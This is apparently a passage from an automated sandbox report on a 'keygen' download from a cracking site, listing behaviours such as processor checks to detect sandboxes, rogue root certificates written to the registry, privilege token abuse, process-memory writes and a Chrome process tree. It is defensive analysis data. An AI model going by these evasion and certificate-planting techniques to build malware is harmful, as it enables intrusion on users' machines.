\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
E309.tmp.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 E309.tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString E309.tmp.exe -
Delays execution with timeout.exe 7 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 7672 timeout.exe 4416 timeout.exe 5808 timeout.exe 6788 timeout.exe 7500 timeout.exe 3196 timeout.exe 4864 timeout.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 1720 taskkill.exe 8396 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe -
Modifies registry class 1 IoCs
Processes:
chrome.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings chrome.exe -
Processes:
keygen-step-2.exeSetup.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 keygen-step-2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e keygen-step-2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 Setup.exe -
Runs ping.exe 1 TTPs 40 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 1548 PING.EXE 4644 PING.EXE 4736 PING.EXE 6296 PING.EXE 7760 PING.EXE 6016 PING.EXE 7588 PING.EXE 5580 PING.EXE 4448 PING.EXE 2632 PING.EXE 4772 PING.EXE 4944 PING.EXE 5288 PING.EXE 5528 PING.EXE 8096 PING.EXE 6728 PING.EXE 5744 PING.EXE 5144 PING.EXE 6712 PING.EXE 6772 PING.EXE 1524 PING.EXE 7208 PING.EXE 6880 PING.EXE 7312 PING.EXE 1420 PING.EXE 5852 PING.EXE 8128 PING.EXE 6496 PING.EXE 2444 PING.EXE 4796 PING.EXE 4968 PING.EXE 4424 PING.EXE 4860 PING.EXE 5172 PING.EXE 7044 PING.EXE 7348 PING.EXE 4336 PING.EXE 6684 PING.EXE 32 PING.EXE 4960 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exekey.exe1613221200584.exeWerFault.exe1613221205193.exeE309.tmp.exeWerFault.exepid process 1900 chrome.exe 1900 chrome.exe 1156 chrome.exe 1156 chrome.exe 4760 chrome.exe 4760 chrome.exe 4380 chrome.exe 4380 chrome.exe 4212 chrome.exe 4212 chrome.exe 4420 chrome.exe 4420 chrome.exe 4856 chrome.exe 4856 chrome.exe 4972 chrome.exe 4972 chrome.exe 4120 chrome.exe 4120 chrome.exe 1636 chrome.exe 1636 chrome.exe 1636 chrome.exe 1636 chrome.exe 4956 key.exe 4956 key.exe 4708 1613221200584.exe 4708 1613221200584.exe 1584 WerFault.exe 1584 WerFault.exe 1584 WerFault.exe 1584 WerFault.exe 1584 WerFault.exe 1584 WerFault.exe 1584 WerFault.exe 1584 WerFault.exe 1584 WerFault.exe 1584 WerFault.exe 1584 WerFault.exe 1584 WerFault.exe 1584 WerFault.exe 1584 WerFault.exe 1584 WerFault.exe 1584 WerFault.exe 936 1613221205193.exe 936 1613221205193.exe 4216 E309.tmp.exe 4216 E309.tmp.exe 4768 WerFault.exe 4768 WerFault.exe 4768 WerFault.exe 4768 WerFault.exe 4768 WerFault.exe 4768 WerFault.exe 4768 WerFault.exe 4768 WerFault.exe 4768 WerFault.exe 4768 WerFault.exe 4768 WerFault.exe 4768 WerFault.exe 4768 WerFault.exe 4768 WerFault.exe 4768 WerFault.exe 4768 WerFault.exe 4768 WerFault.exe 4768 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exedescription pid process Token: SeShutdownPrivilege 4540 msiexec.exe Token: SeIncreaseQuotaPrivilege 4540 msiexec.exe Token: SeSecurityPrivilege 4120 msiexec.exe Token: SeCreateTokenPrivilege 4540 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4540 msiexec.exe Token: SeLockMemoryPrivilege 4540 msiexec.exe Token: SeIncreaseQuotaPrivilege 4540 msiexec.exe Token: SeMachineAccountPrivilege 4540 msiexec.exe Token: SeTcbPrivilege 4540 msiexec.exe Token: SeSecurityPrivilege 4540 msiexec.exe Token: SeTakeOwnershipPrivilege 4540 msiexec.exe Token: SeLoadDriverPrivilege 4540 msiexec.exe Token: SeSystemProfilePrivilege 4540 msiexec.exe Token: SeSystemtimePrivilege 4540 msiexec.exe Token: SeProfSingleProcessPrivilege 4540 msiexec.exe Token: SeIncBasePriorityPrivilege 4540 msiexec.exe Token: SeCreatePagefilePrivilege 4540 msiexec.exe Token: SeCreatePermanentPrivilege 4540 msiexec.exe Token: SeBackupPrivilege 4540 msiexec.exe Token: SeRestorePrivilege 4540 msiexec.exe Token: SeShutdownPrivilege 4540 msiexec.exe Token: SeDebugPrivilege 4540 msiexec.exe Token: SeAuditPrivilege 4540 msiexec.exe Token: SeSystemEnvironmentPrivilege 4540 msiexec.exe Token: SeChangeNotifyPrivilege 4540 msiexec.exe Token: SeRemoteShutdownPrivilege 4540 msiexec.exe Token: SeUndockPrivilege 4540 msiexec.exe Token: SeSyncAgentPrivilege 4540 msiexec.exe Token: SeEnableDelegationPrivilege 4540 msiexec.exe Token: SeManageVolumePrivilege 4540 msiexec.exe Token: SeImpersonatePrivilege 4540 msiexec.exe Token: SeCreateGlobalPrivilege 4540 msiexec.exe Token: SeCreateTokenPrivilege 4540 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4540 msiexec.exe Token: SeLockMemoryPrivilege 4540 msiexec.exe Token: SeIncreaseQuotaPrivilege 4540 msiexec.exe Token: SeMachineAccountPrivilege 4540 msiexec.exe Token: SeTcbPrivilege 4540 msiexec.exe Token: SeSecurityPrivilege 4540 msiexec.exe Token: SeTakeOwnershipPrivilege 4540 msiexec.exe Token: SeLoadDriverPrivilege 4540 msiexec.exe Token: SeSystemProfilePrivilege 4540 msiexec.exe Token: SeSystemtimePrivilege 4540 msiexec.exe Token: SeProfSingleProcessPrivilege 4540 msiexec.exe Token: SeIncBasePriorityPrivilege 4540 msiexec.exe Token: SeCreatePagefilePrivilege 4540 msiexec.exe Token: SeCreatePermanentPrivilege 4540 msiexec.exe Token: SeBackupPrivilege 4540 msiexec.exe Token: SeRestorePrivilege 4540 msiexec.exe Token: SeShutdownPrivilege 4540 msiexec.exe Token: SeDebugPrivilege 4540 msiexec.exe Token: SeAuditPrivilege 4540 msiexec.exe Token: SeSystemEnvironmentPrivilege 4540 msiexec.exe Token: SeChangeNotifyPrivilege 4540 msiexec.exe Token: SeRemoteShutdownPrivilege 4540 msiexec.exe Token: SeUndockPrivilege 4540 msiexec.exe Token: SeSyncAgentPrivilege 4540 msiexec.exe Token: SeEnableDelegationPrivilege 4540 msiexec.exe Token: SeManageVolumePrivilege 4540 msiexec.exe Token: SeImpersonatePrivilege 4540 msiexec.exe Token: SeCreateGlobalPrivilege 4540 msiexec.exe Token: SeCreateTokenPrivilege 4540 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4540 msiexec.exe Token: SeLockMemoryPrivilege 4540 msiexec.exe -
Suspicious use of FindShellTrayWindow 24 IoCs
Processes:
chrome.exemsiexec.exemsiexec.exemsiexec.exepid process 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 4540 msiexec.exe 4540 msiexec.exe 3676 msiexec.exe 5976 msiexec.exe -
Suspicious use of SendNotifyMessage 8 IoCs
Processes:
chrome.exepid process 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe 1156 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 1156 wrote to memory of 1244 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1244 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 3408 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1900 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1900 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1000 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1000 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1000 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1000 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1000 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1000 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1000 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1000 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1000 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1000 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1000 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1000 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1000 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1000 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1000 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1000 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1000 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1000 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1000 1156 chrome.exe chrome.exe PID 1156 wrote to memory of 1000 1156 chrome.exe chrome.exe
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://cracknet.net/1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa8,0xd4,0x7ffc94dd6e00,0x7ffc94dd6e10,0x7ffc94dd6e202⤵PID:1244
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1480 /prefetch:22⤵PID:3408
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1864 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1900 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2164 /prefetch:82⤵PID:1000
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2772 /prefetch:12⤵PID:220
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2792 /prefetch:12⤵PID:192
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:12⤵PID:700
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:12⤵PID:1548
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:12⤵PID:2156
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:12⤵PID:3752
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4392 /prefetch:82⤵PID:4304
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3892 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4760 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4648 /prefetch:82⤵PID:4912
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4800 /prefetch:82⤵PID:4968
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings2⤵PID:5008
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6fa8e7740,0x7ff6fa8e7750,0x7ff6fa8e77603⤵PID:5044
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4764 /prefetch:82⤵PID:5024
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4772 /prefetch:82⤵PID:5080
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4700 /prefetch:82⤵PID:4312
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4940 /prefetch:82⤵PID:4452
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
